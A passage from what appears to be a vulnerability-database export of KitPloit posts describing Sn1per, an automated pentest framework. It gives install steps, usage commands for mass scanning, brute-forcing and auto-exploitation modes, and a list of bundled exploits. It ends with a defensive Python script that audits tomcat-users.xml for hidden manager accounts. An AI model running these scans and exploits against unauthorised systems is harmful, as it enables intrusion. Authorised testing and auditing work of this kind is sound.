IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). 
Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-05T13:45:00", "type": "kitploit", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-04T15:30:45", "description": "[](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ).\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n**Detailed host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n**NMap HTML host reports** \n \n\n\n[](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Quick links to online recon tools and Google hacking queries** \n 
\n\n\n[](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n**Takeovers and Email Security** \n \n\n\n[](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n**HTML5 Notepad** \n \n\n\n[](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n**ORDER SN1PER PROFESSIONAL:** \nTo obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ). \n \n**DEMO VIDEO:** \n \n \n\n\n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, 
MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**EXPLOITS:** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003\n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts\n * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002\n * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561\n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n * Apache Tomcat: Remote Code Execution (CVE-2017-12617)\n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269\n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249\n * Shellshock Bash Shell remote code execution CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)\n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843\n * MS08-067 Microsoft Server Service Relative Path Stack Corruption\n * Webmin File Disclosure CVE-2006-3392\n * VsFTPd 2.3.4 Backdoor\n * ProFTPd 1.3.3C Backdoor\n * MS03-026 Microsoft RPC DCOM Interface Overflow\n * DistCC Daemon Command Execution\n * JBoss Java De-Serialization\n * HTTP 
Writable Path PUT/DELETE File Access\n * Apache Tomcat User Enumeration\n * Tomcat Application Manager Login Bruteforce\n * Jenkins-CI Enumeration\n * HTTP WebDAV Scanner\n * Android Insecure ADB\n * Anonymous FTP Access\n * PHPMyAdmin Backdoor\n * PHPMyAdmin Auth Bypass\n * OpenSSH User Enumeration\n * LibSSH Auth Bypass\n * SMTP User Enumeration\n * Public NFS Mounts\n \n**KALI LINUX INSTALL:** \n\n \n \n bash install.sh\n\n \n**UBUNTU/DEBIAN/PARROT INSTALL:** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n**DOCKER INSTALL:** \n\n \n \n docker build -f Dockerfile .\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <PORT_NUM>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <PORT_NUM>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs a basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerates single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, put the hosts or IPs to be scanned in a text file and run sniper -f /full/path/to/targets.txt -m airstrike to begin scanning.\n * **NUKE:** Launches a full audit of multiple hosts specified in a text file of choice. Usage example: sniper -f /pentest/loot/targets.txt -m nuke -w <WORKSPACE_ALIAS>.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (e.g. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). 
Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against the target via Burp Suite and Arachni.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n**[Download Sn1per](<https://github.com/1N3/Sn1per> \"Download Sn1per\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-12T13:09:00", "type": "kitploit", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"], "modified": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": 
"http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
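The Sn1per exploit list above carries a check for CVE-2009-3843, the hidden Tomcat Manager account in HP Operations Manager described at the top of this page: an extra user with manager roles in the XML file that defines Tomcat users, giving anyone who knows it the upload form at manager/html and therefore code execution. The defensive counterpart a practitioner wants is an audit of tomcat-users.xml in every Tomcat instance bundled with a product, flagging accounts that hold manager or admin roles but are not on the list of expected administrators. The following is an added Python example written for this page, not Sn1per's or HP's code; the sample XML is constructed, and the ovwebusr entry uses a placeholder password rather than the vendor's.

```python
"""Audit a Tomcat tomcat-users.xml for accounts that can reach the Manager app.

Added example for this page (not Sn1per's or HP's code). The sample user
database below is constructed; the ovwebusr password is a placeholder.
"""
import xml.etree.ElementTree as ET

# Roles that grant access to the Manager / Host Manager web applications.
# manager-gui covers /manager/html, the page that serves the WAR upload form.
MANAGER_ROLES = frozenset({
    "manager", "manager-gui", "manager-script", "manager-jmx",
    "manager-status", "admin", "admin-gui", "admin-script",
})

# Constructed sample: one unprivileged user, one expected admin and one
# unexpected account carrying manager roles (modelled on the advisory,
# password is a placeholder).
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
  <user username="admin" password="s3cret" roles="manager-gui"/>
  <user name="ovwebusr" password="PLACEHOLDER" roles="manager-gui, manager-script"/>
</tomcat-users>
"""


def _local(tag):
    """Strip an XML namespace prefix: '{uri}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def privileged_accounts(xml_text, allowlist=frozenset()):
    """Return (username, sorted manager roles) for every user holding a
    manager/admin role whose name is not in the allowlist of expected accounts.

    Tomcat's MemoryUserDatabase accepts both 'username' and 'name' for the
    account attribute, so both are checked, and namespaced (Tomcat 7+) and
    legacy unnamespaced files are handled alike.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if _local(elem.tag) != "user":
            continue
        name = elem.get("username") or elem.get("name") or "<unnamed>"
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        privileged = roles & MANAGER_ROLES
        if privileged and name not in allowlist:
            findings.append((name, sorted(privileged)))
    return findings


def report(xml_text, allowlist=frozenset()):
    """Print one line per unexpected manager account; return the finding count."""
    findings = privileged_accounts(xml_text, allowlist)
    for name, roles in findings:
        print(f"UNEXPECTED manager account: {name!r} roles={','.join(roles)}")
    if not findings:
        print("no unexpected manager accounts")
    return len(findings)


if __name__ == "__main__":
    import sys
    # Pass a real tomcat-users.xml path to audit it; defaults to the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_TOMCAT_USERS
    sys.exit(1 if report(text, allowlist={"admin"}) else 0)
```

Run it against the tomcat-users.xml of each embedded Tomcat (the file lives under the product's own install tree, not necessarily a system-wide Tomcat) with the administrators you actually provisioned in the allowlist; any other account with a manager role is the kind of hidden credential the advisory describes, and also a target for the Sn1per Manager login brute-force listed above.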